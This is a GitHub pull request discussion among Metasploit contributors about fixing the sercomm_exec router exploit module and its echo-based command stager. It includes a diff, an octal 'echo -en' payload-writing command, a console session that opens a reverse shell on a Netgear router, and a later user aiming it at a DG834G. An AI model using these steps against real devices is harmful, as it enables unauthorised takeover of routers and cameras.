Sercomm Exploit module fixes #2874

merged 1 commit into from Jan 16, 2014


None yet

4 participants

  • Added targets for 8 specific targets that I've tested: Cisco WAP4410N,
    Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear
    DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834
  • Added functionality to the CmdStagerEcho mix-in to support encoding via
    octal instead of hex based on the :enc_type option. This is because many
    devices would not output hex encoded values properly.
  • Added options on a per-target basis for the PackFormat (endian pack()
    values for communication), UploadPath (because /tmp wasn't always
    writable), and PayloadEncode (previously mentioned octal encoding
  • Note: For some reason, some devices communicate over one endianness, but
    then require a payload for the other endianess. I'm not sure what's
    causing this, but if those specific combinations are not used, the
    exploit fails. More research may be required for this.

Processing it!

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Jan 14, 2014
@@ -96,9 +104,16 @@ def slice_up_payload(encoded, opts)
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# cut the end of the part until we reach the start
- # of a full byte representation "\\xYZ"
- while (temp.length > 0 && temp[-5, 3] != "\\\\x")
- temp.chop!
+ # of a full byte representation "\\xYZ" or "\\YZ"
+ case opts[:enc_format]
+ when 'octal'
+ while (temp.length > 0 && temp[-4, 2] != "\\\\")
jvazquez-r7 Jan 14, 2014 Contributor

This is a bad assumption, the length codification of a byte on the octal outputed by Rex::Text.to_octal(@exe, "\\\\") isn't always 4. It isn't constant I mean, look at it:

[*] echo -en \\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\55\\1\\0\\0\\6\\2\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\331\\350\\331\\164\\44\\364\\135\\273\\323\\333\\137\\1\\51\\311\\261\\60\\61\\135\\31\\203\\355\\374\\3\\135\\25\\61\\56\\65\\3\\355\\34\\112\\206\\315\\353\\115\\270\\15\\243\\123\\167\\15\\365\\23>>/tmp/sNfSV

So the stager will fail randomly when the length is not enough to store full payload in just one command, and need to slice it.

jvazquez-r7 Jan 14, 2014 Contributor

On the other side, there is aslo Exploit::CmdStagerPrintf who isn't using echo, but the printf command. It supports octal representation. So I recommend:

  • switch to Exploit::CmdStagerPrintf if it works smoothly with the set of targets you've already available
  • If Exploit::CmdStagerPrintf isn't good enough here, use the same way than Exploit::CmdStagerPrintf to cut the end of a part when slicing the payload :)
mandreko Jan 14, 2014 Contributor

Gotcha. I'll have to fix the slicing of the payload. The CmdStagerPrintf doesn't seem to work, as a lot of the busybox installs don't have printf, or when they do, it writes a 0 byte payload.

I'll fix CmdStagerEcho ;)

jvazquez-r7 Jan 14, 2014 Contributor

coolio ! :)

jvennix-r7 Jan 15, 2014 Contributor

This makes me wonder... Maybe some strange versions of echo expect that the hex string collapses the zeroes, "\x1" instead of "\x01"? Crazy, but maybe explains the failures you were seeing.

You could replace the Rex::Text.to_hex(...) call with { |b| sprintf("\\\\x%x", b) }.join to test

mandreko Jan 16, 2014 Contributor

i was manually testing, and even \x41 wasn't working :(


Processing, trying to help with the CmdStagerEcho changes! :)

@jvazquez-r7 jvazquez-r7 referenced this pull request in mandreko/metasploit-framework Jan 16, 2014

Clean CmdStagerEcho and Add module targets #4


Hi @mandreko,

mandreko#4 request tries to clean this pull request by:

  • Cleaning the CmdStagerEcho, and now hopefully it's compatible with all the sercomm module requirements
  • Modifying the sercomm_exec module to add the Netgear N150 target
  • Modifying the sercomm_exec module to add manual targets, where the user can configure the exploitation with advanced options:
'PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
'UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
'NOARGS', [false, "Don't use the echo -en parameters", false ]),
'ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

Please feel free to check, review, discuss and land once you're comfortable and verify it's not breaking nothing and all your targets are working smoothly still! :) Thanks a lot!

@mandreko mandreko Merge pull request #4 from jvazquez-r7/review_2874
Clean CmdStagerEcho and Add module targets

Module working here:

msf > use exploit/linux/misc/sercomm_exec 
msf exploit(sercomm_exec) > set rhost
rhost =>
msf exploit(sercomm_exec) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(sercomm_exec) > set lhost
lhost =>
msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST      yes       The target address
   RPORT  32764            yes       The target port

Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian

msf exploit(sercomm_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian
   1   Generic Linux MIPS Little Endian
   2   Manual Linux MIPS Big Endian
   3   Manual Linux MIPS Little Endian
   4   Cisco WAP4410N
   5   Honeywell WAP-PL2 IP Camera
   6   Netgear DG834
   7   Netgear DG834G
   8   Netgear DG834PN
   9   Netgear DGN1000
   10  Netgear DSG835
   11  Netgear WPNT834

msf exploit(sercomm_exec) > set target 9
target => 9
msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 
[*] Command shell session 1 opened ( -> at 2014-01-16 16:13:11 -0600
[*] Command Stager progress - 100.00% done (1411/1411 bytes)

//bin/sh: ld: not found

Just giving time to travis to finish his test and landing! thanks @mandreko !!!

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2874, @mandreko's sercomm exploit fixes ac9e634
@jvazquez-r7 jvazquez-r7 merged commit f6f2da0 into rapid7:master Jan 16, 2014

1 check passed

default The Travis CI build passed
hsqrealm commented Oct 6, 2015

[] Started reverse handler on ***********
] Command Stager progress - 100.00% done (1164/1164 bytes)
msf exploit(sercomm_exec) >

Netgear DG834G is the router im trying to send the exploit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment